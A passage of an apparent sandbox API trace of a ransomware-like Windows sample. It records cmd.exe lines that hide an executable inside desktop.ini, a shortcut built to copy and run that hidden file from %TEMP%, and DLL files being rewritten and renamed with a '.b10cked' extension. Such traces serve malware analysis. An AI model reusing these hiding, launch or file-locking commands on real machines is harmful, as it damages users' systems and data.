dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x1b4, dwProcessId=0xef8, dwThreadId=0xfb0)) returned 1 [0162.248] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0163.221] CloseHandle (hObject=0x114) returned 1 [0163.221] CloseHandle (hObject=0x1b4) returned 1 [0163.221] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0163.221] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0163.221] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0163.221] GetTickCount () returned 0x316ba [0163.221] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=22001035420) returned 1 [0163.221] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x78\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0163.221] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, 
lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x41\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0163.221] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x35\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0163.221] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x46\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0163.221] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x50\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0163.221] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x42\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0163.221] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6d\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0163.221] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x52\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0163.221] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0163.221] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > 
\"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0163.221] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0163.221] CharUpperBuffW (in: lpsz="explorer.exe \"3082\" & type \"3082\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x59 | out: lpsz="EXPLORER.EXE \"3082\" & TYPE \"3082\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x59 [0163.221] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0163.222] CharUpperBuffW (in: lpsz="explorer.exe \"3082\" & type \"3082\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x5a | out: lpsz="EXPLORER.EXE \"3082\" & TYPE \"3082\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x5a [0163.222] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0163.222] CoInitialize (pvReserved=0x0) returned 0x0 [0163.222] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0163.223] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0163.223] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0163.223] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, 
pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0163.224] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"3082\" & type \"3082\\desktop.ini\" > \"%TEMP%\\xA5FPBmR.exe\" && \"%TEMP%\\xA5FPBmR.exe\"") returned 0x0 [0163.225] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0163.225] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0163.225] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0163.225] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082.lnk", fRemember=0) returned 0x0 [0163.232] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0163.232] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0163.232] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0163.233] CoUninitialize () [0163.233] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0163.233] ReleaseMutex (hMutex=0xf8) returned 1 [0163.233] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0163.233] ReleaseMutex (hMutex=0xf8) returned 1 [0163.233] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0163.233] ReleaseMutex (hMutex=0xf8) returned 1 [0163.233] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0163.233] ReleaseMutex (hMutex=0xf8) returned 1 [0163.233] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\grintl32.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0163.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0163.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb960 [0163.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0163.234] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22002313805) returned 1 [0163.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0163.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb960 [0163.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0163.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0163.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb960 [0163.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0163.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0163.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xb960 [0163.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0163.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0163.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb960 [0163.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0163.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0163.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb960 [0163.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0163.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0163.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb960 [0163.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0163.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0163.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb960 [0163.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0163.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0163.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb960 [0163.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0163.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0163.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb960 [0163.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0163.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xb478 [0163.235] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0164.198] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0164.198] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0164.199] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ec60*=0) returned 0xb960 [0164.199] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0164.199] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0164.199] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0164.199] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xb960 [0164.199] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0164.199] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0164.199] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5caf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5caf, lpOverlapped=0x0) returned 1 [0165.716] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0165.716] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x5caf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x5caf, lpOverlapped=0x0) returned 1 [0165.716] SetFilePointer (in: hFile=0x114, lDistanceToMove=-23727, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5cb1 [0165.716] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5caf, lpNumberOfBytesRead=0x12ec08, 
lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5caf, lpOverlapped=0x0) returned 1 [0166.099] SetFilePointer (in: hFile=0x114, lDistanceToMove=-23727, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5cb1 [0166.099] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x5caf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x5caf, lpOverlapped=0x0) returned 1 [0166.104] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRINTL32.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0166.104] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRINTL32.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x1328744, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GRINTL32.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 20 [0166.104] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xb960 [0166.104] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0166.105] CloseHandle (hObject=0x114) returned 1 [0166.108] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~1.TRX") returned 0x3c [0166.109] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: 
lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0166.109] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xf4c, dwThreadId=0xed8)) returned 1 [0166.114] CloseHandle (hObject=0x1b4) returned 1 [0166.114] CloseHandle (hObject=0x114) returned 1 [0166.114] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0166.114] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0166.114] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0166.114] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 
[0166.114] ReleaseMutex (hMutex=0xf8) returned 1 [0166.114] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0166.114] ReleaseMutex (hMutex=0xf8) returned 1 [0166.114] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0166.114] ReleaseMutex (hMutex=0xf8) returned 1 [0166.114] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0166.114] ReleaseMutex (hMutex=0xf8) returned 1 [0166.114] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\grintl32.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0166.115] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0166.115] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x39960 [0166.115] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0166.115] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22290413816) returned 1 [0166.115] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0166.115] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x39960 [0166.115] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0166.115] SetFilePointer 
(in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0166.115] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x39960 [0166.115] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0166.115] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0166.115] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x39960 [0166.115] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0166.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0166.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x39960 [0166.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0166.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 